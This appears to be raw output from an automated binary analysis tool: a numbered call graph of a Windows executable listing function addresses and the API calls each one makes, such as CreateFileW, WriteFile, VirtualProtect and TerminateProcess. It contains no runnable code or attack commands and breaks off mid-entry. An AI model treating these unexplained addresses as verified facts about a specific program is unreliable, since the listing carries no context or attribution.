97792 88a961 22 API calls 97791->97792 97793 881188 97792->97793 97794 88a961 22 API calls 97793->97794 97795 8811c6 97794->97795 97796 88a961 22 API calls 97795->97796 97797 881292 97796->97797 97830 88171c 97797->97830 97801 8812c4 97802 88a961 22 API calls 97801->97802 97803 8812ce 97802->97803 97851 891940 97803->97851 97805 8812f9 97861 881aab 97805->97861 97807 881315 97808 881325 GetStdHandle 97807->97808 97809 88137a 97808->97809 97810 8c2485 97808->97810 97814 881387 OleInitialize 97809->97814 97810->97809 97811 8c248e 97810->97811 97812 89fddb 22 API calls 97811->97812 97813 8c2495 97812->97813 97868 8f011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97813->97868 97814->97780 97816 8c249e 97869 8f0944 CreateThread 97816->97869 97818 8c24aa CloseHandle 97818->97809 97819->97782 97870 8813f1 97820->97870 97823 8813f1 22 API calls 97824 8813d0 97823->97824 97825 88a961 22 API calls 97824->97825 97826 8813dc 97825->97826 97827 886b57 22 API calls 97826->97827 97828 881129 97827->97828 97829 881bc3 6 API calls 97828->97829 97829->97787 97831 88a961 22 API calls 97830->97831 97832 88172c 97831->97832 97833 88a961 22 API calls 97832->97833 97834 881734 97833->97834 97835 88a961 22 API calls 97834->97835 97836 88174f 97835->97836 97837 89fddb 22 API calls 97836->97837 97838 88129c 97837->97838 97839 881b4a 97838->97839 97840 881b58 97839->97840 97841 88a961 22 API calls 97840->97841 97842 881b63 97841->97842 97843 88a961 22 API calls 97842->97843 97844 881b6e 97843->97844 97845 88a961 22 API calls 97844->97845 97846 881b79 97845->97846 97847 88a961 22 API calls 97846->97847 97848 881b84 97847->97848 97849 89fddb 22 API calls 97848->97849 97850 881b96 RegisterClipboardFormatW 97849->97850 97850->97801 97852 891981 97851->97852 97858 89195d 97851->97858 97877 8a0242 5 API calls __Init_thread_wait 97852->97877 97854 89198b 97854->97858 97878 8a01f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 97854->97878 97856 898727 97860 89196e 97856->97860 97880 8a01f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 97856->97880 97858->97860 97879 8a0242 5 API calls __Init_thread_wait 97858->97879 97860->97805 97862 8c272d 97861->97862 97863 881abb 97861->97863 97881 8f3209 23 API calls 97862->97881 97864 89fddb 22 API calls 97863->97864 97867 881ac3 97864->97867 97866 8c2738 97867->97807 97868->97816 97869->97818 97882 8f092a 28 API calls 97869->97882 97871 88a961 22 API calls 97870->97871 97872 8813fc 97871->97872 97873 88a961 22 API calls 97872->97873 97874 881404 97873->97874 97875 88a961 22 API calls 97874->97875 97876 8813c6 97875->97876 97876->97823 97877->97854 97878->97858 97879->97856 97880->97860 97881->97866 97883 88dee5 97886 88b710 97883->97886 97887 88b72b 97886->97887 97888 8d00f8 97887->97888 97889 8d0146 97887->97889 97913 88b750 97887->97913 97892 8d0102 97888->97892 97895 8d010f 97888->97895 97888->97913 97952 9058a2 207 API calls 2 library calls 97889->97952 97950 905d33 207 API calls 97892->97950 97908 88ba20 97895->97908 97951 9061d0 207 API calls 2 library calls 97895->97951 97898 88bbe0 40 API calls 97898->97913 97899 8d03d9 97899->97899 97901 89d336 40 API calls 97901->97913 97903 88ba4e 97905 8d0322 97955 905c0c 82 API calls 97905->97955 97908->97903 97956 8f359c 82 API calls __wsopen_s 97908->97956 97913->97898 97913->97901 97913->97903 97913->97905 97913->97908 97915 88a8c7 22 API calls 97913->97915 97917 88ec40 97913->97917 97941 88a81b 41 API calls 97913->97941 97942 89d2f0 40 API calls 97913->97942 97943 89a01b 207 API calls 97913->97943 97944 8a0242 5 API calls __Init_thread_wait 97913->97944 97945 89edcd 22 API calls 97913->97945 97946 8a00a3 29 API calls __onexit 97913->97946 97947 8a01f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 97913->97947 97948 89ee53 82 API calls 97913->97948 97949 89e5ca 207 API calls 97913->97949 97953 88aceb 23 API calls messages 97913->97953 97954 8df6bf 23 API calls 97913->97954 97915->97913 97934 88ec76 messages 97917->97934 97918 89fddb 22 API calls 97918->97934 97919 8a0242 RtlEnterCriticalSection RtlLeaveCriticalSection RtlLeaveCriticalSection WaitForSingleObjectEx RtlEnterCriticalSection 97919->97934 97920 88fef7 97926 88a8c7 22 API calls 97920->97926 97933 88ed9d messages 97920->97933 97923 8d4600 97929 88a8c7 22 API calls 97923->97929 97923->97933 97924 8d4b0b 97960 8f359c 82 API calls __wsopen_s 97924->97960 97925 88a8c7 22 API calls 97925->97934 97926->97933 97929->97933 97931 88fbe3 97931->97933 97935 8d4bdc 97931->97935 97940 88f3ae messages 97931->97940 97932 88a961 22 API calls 97932->97934 97933->97913 97934->97918 97934->97919 97934->97920 97934->97923 97934->97924 97934->97925 97934->97931 97934->97932 97934->97933 97936 8a00a3 29 API calls pre_c_initialization 97934->97936 97938 8d4beb 97934->97938 97939 8a01f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97934->97939 97934->97940 97957 8901e0 207 API calls 2 library calls 97934->97957 97958 8906a0 41 API calls messages 97934->97958 97961 8f359c 82 API calls __wsopen_s 97935->97961 97936->97934 97962 8f359c 82 API calls __wsopen_s 97938->97962 97939->97934 97940->97933 97959 8f359c 82 API calls __wsopen_s 97940->97959 97941->97913 97942->97913 97943->97913 97944->97913 97945->97913 97946->97913 97947->97913 97948->97913 97949->97913 97950->97895 97951->97908 97952->97913 97953->97913 97954->97913 97955->97908 97956->97899 97957->97934 97958->97934 97959->97933 97960->97933 97961->97938 97962->97933 97963 8d2a00 97974 88d7b0 messages 97963->97974 97964 88d9d5 97965 88db11 PeekMessageW 97965->97974 97966 88d807 GetInputState 97966->97965 97966->97974 97967 8d1cbe TranslateAcceleratorW 97967->97974 97969 88db8f PeekMessageW 97969->97974 97970 88da04 timeGetTime 97970->97974 97971 88db73 TranslateMessage DispatchMessageW 97971->97969 97972 88dbaf Sleep 97975 88dbc0 97972->97975 97973 8d2b74 Sleep 97973->97975 97974->97964 97974->97965 97974->97966 97974->97967 97974->97969 97974->97970 97974->97971 97974->97972 97974->97973 97976 8d1dda timeGetTime 97974->97976 97991 88ec40 207 API calls 97974->97991 97995 88dd50 97974->97995 98002 88dfd0 97974->98002 98030 891310 97974->98030 98087 88bf40 207 API calls 2 library calls 97974->98087 98088 89edf6 IsDialogMessageW GetClassLongW 97974->98088 98090 8f3a2a 23 API calls 97974->98090 98091 8f359c 82 API calls __wsopen_s 97974->98091 97975->97964 97975->97974 97977 89e551 timeGetTime 97975->97977 97980 8d2c0b GetExitCodeProcess 97975->97980 97984 8d2a31 97975->97984 97985 9129bf GetForegroundWindow 97975->97985 97986 8d2ca9 Sleep 97975->97986 98092 905658 23 API calls 97975->98092 98093 8ee97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97975->98093 98094 8ed4dc 47 API calls 97975->98094 98089 89e300 23 API calls 97976->98089 97977->97975 97982 8d2c37 CloseHandle 97980->97982 97983 8d2c21 WaitForSingleObject 97980->97983 97982->97975 97983->97974 97983->97982 97984->97964 97985->97975 97986->97974 97991->97974 97996 88dd6f 97995->97996 97997 88dd83 97995->97997 98095 88d260 207 API calls 2 library calls 97996->98095 98096 8f359c 82 API calls __wsopen_s 97997->98096 98000 88dd7a 98000->97974 98001 8d2f75 98001->98001 98004 88e010 98002->98004 98003 8d2f7a 98005 88ec40 207 API calls 98003->98005 98004->98003 98007 88e075 98004->98007 98006 8d2f8c 98005->98006 98024 88e0dc messages 98006->98024 98099 8f359c 82 API calls __wsopen_s 98006->98099 98007->98024 98100 8a0242 5 API calls __Init_thread_wait 98007->98100 98011 8d2fca 98013 88a961 22 API calls 98011->98013 98011->98024 98012 88a961 22 API calls 98012->98024 98016 8d2fe4 98013->98016 98101 8a00a3 29 API calls __onexit 98016->98101 98018 8d2fee 98102 8a01f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 98018->98102 98021 88ec40 207 API calls 98021->98024 98023 88a8c7 22 API calls 98023->98024 98024->98012 98024->98021 98024->98023 98025 8904f0 22 API calls 98024->98025 98026 88e3e1 98024->98026 98028 8f359c 82 API calls 98024->98028 98097 88a81b 41 API calls 98024->98097 98098 89a308 207 API calls 98024->98098 98103 8a0242 5 API calls __Init_thread_wait 98024->98103 98104 8a00a3 29 API calls __onexit 98024->98104 98105 8a01f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 98024->98105 98106 9047d4 207 API calls 98024->98106 98107 9068c1 207 API calls 98024->98107 98025->98024 98026->97974 98028->98024 98031 8917b0 98030->98031 98032 891376 98030->98032 98265 8a0242 5 API calls __Init_thread_wait 98031->98265 98034 8d6331 98032->98034 98036 891940 9 API calls 98032->98036 98224 90709c 98034->98224 98035 8917ba 98038 8917fb 98035->98038 98041 889cb3 22 API calls 98035->98041 98039 8913a0 98036->98039 98044 8d6346 98038->98044 98046 89182c 98038->98046 98042 891940 9 API calls 98039->98042 98040 8d633d 98040->97974 98050 8917d4 98041->98050 98043 8913b6 98042->98043 98043->98038 98045 8913ec 98043->98045 98270 8f359c 82 API calls __wsopen_s 98044->98270 98045->98044 98069 891408 __fread_nolock 98045->98069 98267 88aceb 23 API calls messages 98046->98267 98049 891839 98268 89d217 207 API calls 98049->98268 98266 8a01f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 98050->98266 98053 8d636e 98074 8d6369 98053->98074 98271 8f359c 82 API calls __wsopen_s 98053->98271 98054 89152f 98056 89153c 98054->98056 98057 8d63d1 98054->98057 98059 891940 9 API calls 98056->98059 98273 905745 54 API calls _wcslen 98057->98273 98061 891549 98059->98061 98060 89fddb 22 API calls 98060->98069 98064 8d64fa 98061->98064 98066 891940 9 API calls 98061->98066 98062 891872 98062->98034 98269 89faeb 23 API calls 98062->98269 98063 89fe0b 22 API calls 98063->98069 98064->98074 98274 8f359c 82 API calls __wsopen_s 98064->98274 98070 891563 98066->98070 98068 88ec40 207 API calls 98068->98069 98069->98049 98069->98053 98069->98054 98069->98060 98069->98063 98069->98068 98071 8d63b2 98069->98071 98069->98074 98070->98064 98073 88a8c7 22 API calls 98070->98073 98076 8915c7 messages 98070->98076 98272 8f359c 82 API calls __wsopen_s 98071->98272 98073->98076 98074->97974 98075 891940 9 API calls 98075->98076 98076->98062 98076->98064 98076->98074 98076->98075 98079 89167b messages 98076->98079 98108 90e204 98076->98108 98144 8ff0ec 98076->98144 98153 8f744a 98076->98153 98209 8f83da 98076->98209 98212 886246 98076->98212 98216 90958b 98076->98216 98219 886216 98076->98219 98077 89171d 98077->97974 98079->98077 98264 89ce17 22 API calls messages 98079->98264 98087->97974 98088->97974 98089->97974 98090->97974 98091->97974 98092->97975 98093->97975 98094->97975 98095->98000 98096->98001 98097->98024 98098->98024 98099->98024 98100->98011 98101->98018 98102->98024 98103->98024 98104->98024 98105->98024 98106->98024 98107->98024 98109 88a961 22 API calls 98108->98109 98110 90e21b 98109->98110 98111 887510 53 API calls 98110->98111 98112 90e22a 98111->98112 98113 886270 22 API calls 98112->98113 98114 90e23d 98113->98114 98115 887510 53 API calls 98114->98115 98116 90e24a 98115->98116 98117 90e262 98116->98117 98118 90e2c7 98116->98118 98294 88b567 39 API calls 98117->98294 98119 887510 53 API calls 98118->98119 98121 90e2cc 98119->98121 98123 90e314 98121->98123 98124 90e2d9 98121->98124 98122 90e267 98122->98124 98126 90e280 98122->98126 98130 90e32c 98123->98130 98298 88b567 39 API calls 98123->98298 98297 889c6e 22 API calls 98124->98297 98295 886d25 22 API calls __fread_nolock 98126->98295 98129 90e28d 98133 886350 22 API calls 98129->98133 98134 90e345 98130->98134 98299 88b567 39 API calls 98130->98299 98132 88a8c7 22 API calls 98135 90e35f 98132->98135 98136 90e29b 98133->98136 98134->98132 98275 8e92c8 98135->98275 98296 886d25 22 API calls __fread_nolock 98136->98296 98139 90e2b4 98140 886350 22 API calls 98139->98140 98143 90e2c2 98140->98143 98141 90e2e6 98141->98076 98300 8862b5 22 API calls 98143->98300 98145 887510 53 API calls 98144->98145 98146 8ff126 98145->98146 98313 889e90 98146->98313 98148 8ff136 98149 8ff15b 98148->98149 98150 88ec40 207 API calls 98148->98150 98152 8ff15f 98149->98152 98341 889c6e 22 API calls 98149->98341 98150->98149 98152->98076 98154 8f7474 98153->98154 98155 8f7469 98153->98155 98159 88a961 22 API calls 98154->98159 98196 8f7554 98154->98196 98357 88b567 39 API calls 98155->98357 98157 89fddb 22 API calls 98158 8f7587 98157->98158 98160 89fe0b 22 API calls 98158->98160 98161 8f7495 98159->98161 98162 8f7598 98160->98162 98163 88a961 22 API calls 98161->98163 98164 886246 CloseHandle 98162->98164 98165 8f749e 98163->98165 98166 8f75a3 98164->98166 98167 887510 53 API calls 98165->98167 98169 88a961 22 API calls 98166->98169 98168 8f74aa 98167->98168 98358 88525f 22 API calls 98168->98358 98171 8f75ab 98169->98171 98173 886246 CloseHandle 98171->98173 98172 8f74bf 98174 886350 22 API calls 98172->98174 98175 8f75b2 98173->98175 98176 8f74f2 98174->98176 98177 887510 53 API calls 98175->98177 98178 8f754a 98176->98178 98359 8ed4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 98176->98359 98179 8f75be 98177->98179 98361 88b567 39 API calls 98178->98361 98181 886246 CloseHandle 98179->98181 98184 8f75c8 98181->98184 98183 8f7502 98183->98178 98185 8f7506 98183->98185 98349 885745 98184->98349 98186 889cb3 22 API calls 98185->98186 98189 8f7513 98186->98189 98360 8ed2c1 26 API calls 98189->98360 98190 8f76de GetLastError 98193 8f76f7 98190->98193 98191 8f75ea 98362 8853de 27 API calls messages 98191->98362 98195 886216 CloseHandle 98193->98195 98207 8f76a4 98195->98207 98196->98157 98196->98207 98197 8f75f8 98363 8853c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98197->98363 98198 8f751c 98198->98178 98200 8f7645 98201 89fddb 22 API calls 98200->98201 98203 8f7679 98201->98203 98202 8f75ff 98202->98200 98364 8eccff 98202->98364 98205 88a961 22 API calls 98203->98205 98206 8f7686 98205->98206 98206->98207 98368 8e417d 22 API calls __fread_nolock 98206->98368 98207->98076 98371 8f98e3 98209->98371 98211 8f83ea 98211->98076 98213 88625f 98212->98213 98214 886250 98212->98214 98213->98214 98215 886264 CloseHandle 98213->98215 98214->98076 98215->98214 98432 907f59 98216->98432 98218 90959b 98218->98076 98220 886246 CloseHandle 98219->98220 98221 88621e 98220->98221 98222 886246 CloseHandle 98221->98222 98223 88622d messages 98222->98223 98223->98076 98225 9070f5 98224->98225 98226 9070db 98224->98226 98516 905689 98225->98516 98527 8f359c 82 API calls __wsopen_s 98226->98527 98230 88ec40 206 API calls 98231 907164 98230->98231 98232 9071a6 98231->98232 98233 9071ff 98231->98233 98236 9070ed 98231->98236 98242 8f0acc 22 API calls 98232->98242 98234 907253 98233->98234 98235 907205 98233->98235 98234->98236 98237 887510 53 API calls 98234->98237 98528 8f1119 22 API calls 98235->98528 98236->98040 98238 907265 98237->98238 98240 88aec9 22 API calls 98238->98240 98243 907289 CharUpperBuffW 98240->98243 98241 907228 98529 88a673 22 API calls 98241->98529 98245 9071de 98242->98245 98248 9072a3 98243->98248 98247 891310 206 API calls 98245->98247 98246 907230 98530 88bf40 207 API calls 2 library calls 98246->98530 98247->98236 98249 9072f6 98248->98249 98250 9072aa 98248->98250 98251 887510 53 API calls 98249->98251 98523 8f0acc 98250->98523 98253 9072fe 98251->98253 98531 89e300 23 API calls 98253->98531 98257 891310 206 API calls 98257->98236 98258 907308 98258->98236 98259 887510 53 API calls 98258->98259 98260 907323 98259->98260 98532 88a673 22 API calls 98260->98532 98262 907333 98533 88bf40 207 API calls 2 library calls 98262->98533 98264->98079 98265->98035 98266->98038 98267->98049 98268->98062 98269->98062 98270->98074 98271->98074 98272->98074 98273->98070 98274->98074 98276 88a961 22 API calls 98275->98276 98277 8e92de 98276->98277 98278 886270 22 API calls 98277->98278 98279 8e92f2 98278->98279 98285 8e9314 98279->98285 98301 8e8e54 98279->98301 98281 8e8e54 41 API calls 98281->98285 98285->98281 98286 8e93b3 98285->98286 98287 886350 22 API calls 98285->98287 98290 8e9397 98285->98290 98309 886d25 22 API calls __fread_nolock 98285->98309 98288 88a8c7 22 API calls 98286->98288 98289 8e93c2 98286->98289 98287->98285 98288->98289 98289->98143 98310 886d25 22 API calls __fread_nolock 98290->98310 98292 8e93a7 98293 886350 22 API calls 98292->98293 98293->98286 98294->98122 98295->98129 98296->98139 98297->98141 98298->98130 98299->98134 98300->98141 98303 8e8e74 _wcslen 98301->98303 98302 8e8f63 98302->98285 98308 886d25 22 API calls __fread_nolock 98302->98308 98303->98302 98304 8e8f68 98303->98304 98305 8e8ea9 98303->98305 98304->98302 98312 89ce60 41 API calls 98304->98312 98305->98302 98311 89ce60 41 API calls 98305->98311 98308->98285 98309->98285 98310->98292 98311->98305 98312->98304 98314 886270 22 API calls 98313->98314 98340 889eb5 98314->98340 98315 889fd2 98316 88a4a1 22 API calls 98315->98316 98317 889fec 98316->98317 98317->98148 98320 88a6c3 22 API calls 98320->98340 98321 8cf7c4 98347 8e96e2 84 API calls __wsopen_s 98321->98347 98322 8cf699 98329 89fddb 22 API calls 98322->98329 98323 88a405 98323->98317 98348 8e96e2 84 API calls __wsopen_s 98323->98348 98324 88a4a1 22 API calls 98324->98340 98328 8cf7d2 98330 88a4a1 22 API calls 98328->98330 98331 8cf754 98329->98331 98332 8cf7e8 98330->98332 98333 89fe0b 22 API calls 98331->98333 98332->98317 98334 88a12c __fread_nolock 98333->98334 98334->98321 98334->98323 98336 88a587 22 API calls 98336->98340 98337 88aec9 22 API calls 98338 88a0db CharUpperBuffW 98337->98338 98343 88a673 22 API calls 98338->98343 98340->98315 98340->98320 98340->98321 98340->98322 98340->98323 98340->98324 98340->98334 98340->98336 98340->98337 98342 884573 41 API calls _wcslen 98340->98342 98344 8848c8 23 API calls 98340->98344 98345 8849bd 22 API calls __fread_nolock 98340->98345 98346 88a673 22 API calls 98340->98346 98341->98152 98342->98340 98343->98340 98344->98340 98345->98340 98346->98340 98347->98328 98348->98317 98350 88575c CreateFileW 98349->98350 98351 8c4035 98349->98351 98352 88577b 98350->98352 98351->98352 98353 8c403b CreateFileW 98351->98353 98352->98190 98352->98191 98353->98352 98354 8c4063 98353->98354 98369 8854c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98354->98369 98356 8c406e 98356->98352 98357->98154 98358->98172 98359->98183 98360->98198 98361->98196 98362->98197 98363->98202 98365 8ecd0e 98364->98365 98366 8ecd19 WriteFile 98364->98366 98370 8ecc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98365->98370 98366->98200 98368->98207 98369->98356 98370->98366 98372 8f99e8 98371->98372 98373 8f9902 98371->98373 98428 8f9caa 39 API calls 98372->98428 98374 89fddb 22 API calls 98373->98374 98376 8f9909 98374->98376 98378 89fe0b 22 API calls 98376->98378 98377 8f99ca 98377->98211 98379 8f991a 98378->98379 98381 886246 CloseHandle 98379->98381 98380 8f9ac5 98422 8f1e96 98380->98422 98383 8f9925 98381->98383 98386 88a961 22 API calls 98383->98386 98384 8f9acc 98391 8eccff 4 API calls 98384->98391 98385 8f99a2 98385->98377 98385->98380 98387 8f9a33 98385->98387 98388 8f992d 98386->98388 98389 887510 53 API calls 98387->98389 98390 886246 CloseHandle 98388->98390 98396 8f9a3a 98389->98396 98392 8f9934 98390->98392 98400 8f9aa8 98391->98400 98393 887510 53 API calls 98392->98393 98395 8f9940 98393->98395 98394 8f9abb 98430 8ecd57 30 API calls 98394->98430 98398 886246 CloseHandle 98395->98398 98396->98394 98414 8f9a6e 98396->98414 98401 8f994a 98398->98401 98399 886270 22 API calls 98402 8f9a7e 98399->98402 98400->98377 98403 886246 CloseHandle 98400->98403 98404 885745 5 API calls 98401->98404 98405 8f9a8e 98402->98405 98409 88a8c7 22 API calls 98402->98409 98406 8f9b1e 98403->98406 98408 8f9959 98404->98408 98410 8833c6 22 API calls 98405->98410 98407 886216 CloseHandle 98406->98407 98407->98377 98411 8f995d 98408->98411 98412 8f99c2 98408->98412 98409->98405 98413 8f9a9c 98410->98413 98426 8853de 27 API calls messages 98411->98426 98415 886216 CloseHandle 98412->98415 98429 8ecd57 30 API calls 98413->98429 98414->98399 98415->98377 98418 8f996b 98427 8853c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98418->98427 98420 8f9972 98420->98385 98421 8eccff 4 API calls 98420->98421 98421->98385 98423 8f1e9f 98422->98423 98425 8f1ea4 98422->98425 98431 8f0f67 24 API calls __fread_nolock 98423->98431 98425->98384 98426->98418 98427->98420 98428->98385 98429->98400 98430->98400 98431->98425 98433 887510 53 API calls 98432->98433 98434 907f90 98433->98434 98458 907fd5 messages 98434->98458 98470 908cd3 98434->98470 98436 908281 98437 90844f 98436->98437 98441 90828f 98436->98441 98511 908ee4 60 API calls 98437->98511 98440 90845e 98440->98441 98442 90846a 98440->98442 98483 907e86 98441->98483 98442->98458 98443 887510 53 API calls 98460 908049 98443->98460 98448 9082c8 98498 89fc70 98448->98498 98451 908302 98505 8863eb 22 API calls 98451->98505 98452 9082e8 98504 8f359c 82 API calls __wsopen_s 98452->98504 98455 9082f3 GetCurrentProcess TerminateProcess 98455->98451 98456 908311 98506 886a50 22 API calls 98456->98506 98458->98218 98459 90832a 98468 908352 98459->98468 98507 8904f0 22 API calls 98459->98507 98460->98436 98460->98443 98460->98458 98502 8e417d 22 API calls __fread_nolock 98460->98502 98503 90851d 42 API calls _strftime 98460->98503 98461 9084c5 98461->98458 98465 9084d9 FreeLibrary 98461->98465 98463 908341 98508 908b7b 75 API calls 98463->98508 98465->98458 98468->98461 98509 8904f0 22 API calls 98468->98509 98510 88aceb 23 API calls messages 98468->98510 98512 908b7b 75 API calls 98468->98512 98471 88aec9 22 API calls 98470->98471 98472 908cee CharLowerBuffW 98471->98472 98473 8e8e54 41 API calls 98472->98473 98474 908d0f 98473->98474 98476 88a961 22 API calls 98474->98476 98482 908d48 _wcslen 98474->98482 98477 908d2a 98476->98477 98513 886d25 22 API calls __fread_nolock 98477->98513 98479 908d3e 98480 8893b2 22 API calls 98479->98480 98480->98482 98481 908e5e _wcslen 98481->98460 98482->98481 98514 90851d 42 API calls _strftime 98482->98514 98484 907ea1 98483->98484 98488 907eec 98483->98488 98485 89fe0b 22 API calls 98484->98485 98487 907ec3 98485->98487 98486 89fddb 22 API calls 98486->98487 98487->98486 98487->98488 98489 909096 98488->98489 98490 9092ab messages 98489->98490 98497 9090ba _strcat _wcslen 98489->98497 98490->98448 98491 88b38f 39 API calls 98491->98497 98492 88b567 39 API calls 98492->98497 98493 88b6b5 39 API calls 98493->98497 98494 8aea0c 21 API calls ___std_exception_copy 98494->98497 98495 887510 53 API calls 98495->98497 98497->98490 98497->98491 98497->98492 98497->98493 98497->98494 98497->98495 98515 8eefae 24 API calls _wcslen 98497->98515 98499 89fc85 98498->98499 98500 89fd1d VirtualProtect 98499->98500 98501 89fceb 98499->98501 98500->98501 98501->98451 98501->98452 98502->98460 98503->98460 98504->98455 98505->98456 98506->98459 98507->98463 98508->98468 98509->98468 98510->98468 98511->98440 98512->98468 98513->98479 98514->98481 98515->98497 98517 9056a4 98516->98517 98522 9056f2 98516->98522 98518 89fe0b 22 API calls 98517->98518 98519 9056c6 98518->98519 98520 89fddb 22 API calls 98519->98520 98519->98522 98534 8f0a59 22 API calls 98519->98534 98520->98519 98522->98230 98524 8f0ada 98523->98524 98525 8f0b13 98523->98525 98524->98525 98526 89fddb 22 API calls 98524->98526 98525->98257 98526->98525 98527->98236 98528->98241 98529->98246 98530->98236 98531->98258 98532->98262 98533->98236 98534->98519 98535 881098 98540 8842de 98535->98540 98539 8810a7 98541 88a961 22 API calls 98540->98541 98542 8842f5 GetVersionExW 98541->98542 98543 886b57 22 API calls 98542->98543 98544 884342 98543->98544 98545 8893b2 22 API calls 98544->98545 98559 884378 98544->98559 98546 88436c 98545->98546 98548 8837a0 22 API calls 98546->98548 98547 88441b GetCurrentProcess IsWow64Process 98549 884437 98547->98549 98548->98559 98550 88444f LoadLibraryA 98549->98550 98551 8c3824 GetSystemInfo 98549->98551 98552 88449c GetSystemInfo 98550->98552 98553 884460 GetProcAddress 98550->98553 98554 884476 98552->98554 98553->98552 98556 884470 GetNativeSystemInfo 98553->98556 98557 88447a FreeLibrary 98554->98557 98558 88109d 98554->98558 98555 8c37df 98556->98554 98557->98558 98560 8a00a3 29 API calls __onexit 98558->98560 98559->98547 98559->98555 98560->98539 98561 8a03fb 98562 8a0407 ___scrt_is_nonwritable_in_current_image 98561->98562 98592 89feb1 98562->98592 98564 8a040e 98565 8a0561 98564->98565 98568 8a0438 98564->98568 98619 8a083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98565->98619 98567 8a0568 98620 8a4e52 28 API calls _abort 98567->98620 98581 8a0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98568->98581 98603 8b247d 98568->98603 98570 8a056e 98621 8a4e04 28 API calls _abort 98570->98621 98574 8a0576 98622 8a0aea GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 98574->98622 98575 8a0457 98578 8a057c __scrt_common_main_seh 98579 8a04d8 98611 8a0959 98579->98611 98581->98579 98615 8a4e1a 38 API calls 3 library calls 98581->98615 98583 8a04de 98584 8a04f3 98583->98584 98616 8a0992 GetModuleHandleW 98584->98616 98586 8a04fa 98586->98567 98587 8a04fe 98586->98587 98588 8a0507 98587->98588 98617 8a4df5 28 API calls _abort 98587->98617 98618 8a0040 13 API calls 2 library calls 98588->98618 98591 8a050f 98591->98575 98593 89feba 98592->98593 98623 8a0698 IsProcessorFeaturePresent 98593->98623 98595 89fec6 98624 8a2c94 10 API calls 3 library calls 98595->98624 98597 89fecb 98598 89fecf 98597->98598 98625 8b2317 98597->98625 98598->98564 98601 89fee6 98601->98564 98604 8b2494 98603->98604 98605 8a0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98604->98605 98606 8a0451 98605->98606 98606->98575 98607 8b2421 98606->98607 98608 8b2450 98607->98608 98609 8a0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98608->98609 98610 8b2479 98609->98610 98610->98581 98676 8a2340 98611->98676 98614 8a097f 98614->98583 98615->98579 98616->98586 98617->98588 98618->98591 98619->98567 98620->98570 98621->98574 98622->98578 98623->98595 98624->98597 98629 8bd1f6 98625->98629 98628 8a2cbd 8 API calls 3 library calls 98628->98598 98632 8bd20f 98629->98632 98633 8bd213 98629->98633 98631 89fed8 98631->98601 98631->98628 98647 8a0a8c 98632->98647 98633->98632 98635 8b4bfb 98633->98635 98636 8b4c07 ___scrt_is_nonwritable_in_current_image 98635->98636 98654 8b2f5e RtlEnterCriticalSection 98636->98654 98638 8b4c0e 98655 8b50af 98638->98655 98640 8b4c1d 98646 8b4c2c 98640->98646 98668 8b4a8f 29 API calls 98640->98668 98643 8b4c27 98669 8b4b45 GetStdHandle GetFileType 98643->98669 98645 8b4c3d __wsopen_s 98645->98633 98670 8b4c48 RtlLeaveCriticalSection _abort 98646->98670 98648 8a0a97 IsProcessorFeaturePresent 98647->98648 98649 8a0a95 98647->98649 98651 8a0c5d 98648->98651 98649->98631 98675 8a0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98651->98675 98653 8a0d40 98653->98631 98654->98638 98656 8b50bb ___scrt_is_nonwritable_in_current_image 98655->98656 98657 8b50c8 98656->98657 98658 8b50df 98656->98658 98672 8af2d9 20 API calls _free 98657->98672 98671 8b2f5e RtlEnterCriticalSection 98658->98671 98661 8b50cd 98673 8b27ec 26 API calls pre_c_initialization 98661->98673 98663 8b50d7 __wsopen_s 98663->98640 98664 8b5117 98674 8b513e RtlLeaveCriticalSection _abort 98664->98674 98665 8b50eb 98665->98664 98667 8b5000 __wsopen_s 21 API calls 98665->98667 98667->98665 98668->98643 98669->98646 98670->98645 98671->98665 98672->98661 98673->98663 98674->98663 98675->98653 98677 8a096c GetStartupInfoW 98676->98677 98677->98614 98678 88f7bf 98679 88f7d3 98678->98679 98680 88fcb6 98678->98680 98682 88fcc2 98679->98682 98683 89fddb 22 API calls 98679->98683 98715 88aceb 23 API calls messages 98680->98715 98716 88aceb 23 API calls messages 98682->98716 98685 88f7e5 98683->98685 98685->98682 98686 88f83e 98685->98686 98687 88fd3d 98685->98687 98689 891310 207 API calls 98686->98689 98711 88ed9d messages 98686->98711 98717 8f1155 22 API calls 98687->98717 98709 88ec76 messages 98689->98709 98690 89fddb 22 API calls 98690->98709 98691 88fef7 98697 88a8c7 22 API calls 98691->98697 98691->98711 98694 8d4600 98700 88a8c7 22 API calls 98694->98700 98694->98711 98695 8d4b0b 98719 8f359c 82 API calls __wsopen_s 98695->98719 98696 88a8c7 22 API calls 98696->98709 98697->98711 98700->98711 98702 8a0242 RtlEnterCriticalSection RtlLeaveCriticalSection RtlLeaveCriticalSection WaitForSingleObjectEx RtlEnterCriticalSection 98702->98709 98703 88fbe3 98706 8d4bdc 98703->98706 98703->98711 98712 88f3ae messages 98703->98712 98704 88a961 22 API calls 98704->98709 98705 8a00a3 29 API calls pre_c_initialization 98705->98709 98720 8f359c 82 API calls __wsopen_s 98706->98720 98708 8d4beb 98721 8f359c 82 API calls __wsopen_s 98708->98721 98709->98690 98709->98691 98709->98694 98709->98695 98709->98696 98709->98702 98709->98703 98709->98704 98709->98705 98709->98708 98710 